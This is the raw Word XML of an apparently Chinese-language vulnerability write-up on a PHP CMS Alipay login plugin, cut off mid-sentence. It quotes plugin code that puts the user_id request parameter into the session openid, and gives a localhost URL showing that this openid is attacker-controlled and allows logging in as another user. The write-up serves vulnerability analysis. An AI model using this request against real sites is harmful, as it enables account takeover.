            <v:line id="_x0000_s8398" style="position:absolute" from="1614,12383" to="1614,12894" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8397" style="position:absolute" from="8364,12383" to="8364,12894" strokecolor="#ccc" strokeweight=".24pt"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8395" type="#_x0000_t202" style="position:absolute;margin-left:294.5pt;margin-top:345.25pt;width:6pt;height:9.95pt;z-index:-365344;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="199" w:lineRule="exact"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t>=</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417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8394" type="#_x0000_t202" style="width:295.1pt;height:238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80020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="391" w:lineRule="auto"/>
                    <w:ind w:firstLine="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$where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array(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'ologin_code'=&gt;front::$get['ologin_code']);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799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$ologins =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ologin::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>getInstance(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>)-&gt;getrows($where);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firstLine="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$ologin = </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>unserialize_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>config(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$ologins[0]['ologin_config']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>//var_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>dump(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$ologin);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="799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'partner'] =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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ologin[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'alipaylogin_id'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="799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'key'] =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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ologin[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'alipaylogin_key'];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right="1195" w:firstLine="799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'return_url'] = ologin::url(basename(  FILE</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="107"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,'.php'));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4451"/>
                    </w:tabs>
                    <w:ind w:left="799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'sign_type']</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-3"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'MD5';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124" w:line="200" w:lineRule="exact"/>
                    <w:ind w:left="799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'input_charset']= 'utf-8';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a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8393" type="#_x0000_t202" style="position:absolute;margin-left:129.85pt;margin-top:6.35pt;width:236.75pt;height:26.3pt;z-index:5488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pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="3652"/>
                    </w:tabs>
                    <w:spacing w:line="199" w:lineRule="exact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'transport']</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>=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'http';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126" w:line="200" w:lineRule="exact"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$aliapy_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>config[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'cacert']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8392" type="#_x0000_t202" style="position:absolute;margin-left:89.9pt;margin-top:39pt;width:277.1pt;height:26.3pt;z-index:5512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pStyle w:val="a3"/>
                    <w:spacing w:line="199" w:lineRule="exact"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>getcwd(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>).'/lib/plugins/alipayauth/cacert.pem'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95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 w:line="200" w:lineRule="exact"/>
                    <w:ind w:left="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>//var_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>dump(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$aliapy_config);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spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="7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80020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8391" type="#_x0000_t202" style="position:absolute;margin-left:89.9pt;margin-top:10.3pt;width:313.2pt;height:26.3pt;z-index:5536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pStyle w:val="a3"/>
                    <w:spacing w:line="199" w:lineRule="exact"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>unset(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$_GET['case']);unset($_GET['act']);unset($_GET</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126" w:line="200" w:lineRule="exact"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>['ologin_code'])</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>;unset</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>($_GET['site']);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80020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8390" type="#_x0000_t202" style="position:absolute;margin-left:89.9pt;margin-top:10.45pt;width:319.1pt;height:91.45pt;z-index:5560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pStyle w:val="a3"/>
                    <w:spacing w:line="199" w:lineRule="exact"/>
                    <w:ind w:right="-5"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>require_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>once(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"alipayauth/alipay_notify.class.php");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right="-5" w:firstLine="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$alipayNotify = new </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>AlipayNotify(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$aliapy_config);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799" w:right="-5"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>//var_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>dump(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$alipayNotify);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="799" w:right="-5"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$verify_result =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-96"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$alipayNotify-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>verifyReturn(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 w:line="200" w:lineRule="exact"/>
                    <w:ind w:left="799" w:right="-5"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>//var_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>dump(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$verify_result);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rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8389" type="#_x0000_t202" style="position:absolute;margin-left:129.85pt;margin-top:10.45pt;width:236.9pt;height:58.8pt;z-index:5584;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" filled="f" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="213" w:lineRule="exact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true || $verify_result) {//</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>验证成功</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="400"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$user_id = front:</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>get['user_id'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="21" w:line="326" w:lineRule="exact"/>
                    <w:ind w:left="400"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$token = front:</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">get['token']; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>session::set('access_token',$token);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Times New Roman"/>
          <w:sz w:val="16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388" type="#_x0000_t202" style="width:337.5pt;height:67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380" w:right="1493"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>session::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>set(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"openid",$user_id); return array('nickname'=&gt;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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>front::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>get(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'real_name'));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5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>true || $verify_result) {//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证成功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这一行我们让它永远成立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因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</w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前全是配置信息的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>东</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>西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a3"/>
        <w:spacing w:before="155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8387" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:24.15pt;width:337.5pt;height:116.05pt;z-index:568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6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$user_id = front:</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>get['user_id'];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380" w:right="1011"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$token = front:</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>get['token']; session::set('access_token',$token); session::set("openid",$user_id); return array(</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'nickname'=&gt;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front::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>get(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'real_name'))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直接看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="34" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-83"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">openid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完全可控制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="304" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>们发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>送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Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId64">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:w w:val="95"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://localhost/uploads/index.php?case=user&amp;act=respon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>d&amp;ologin_code=alipaylogin&amp;user_id=2&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>real_name=test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdan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这时候我们的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-5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openid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
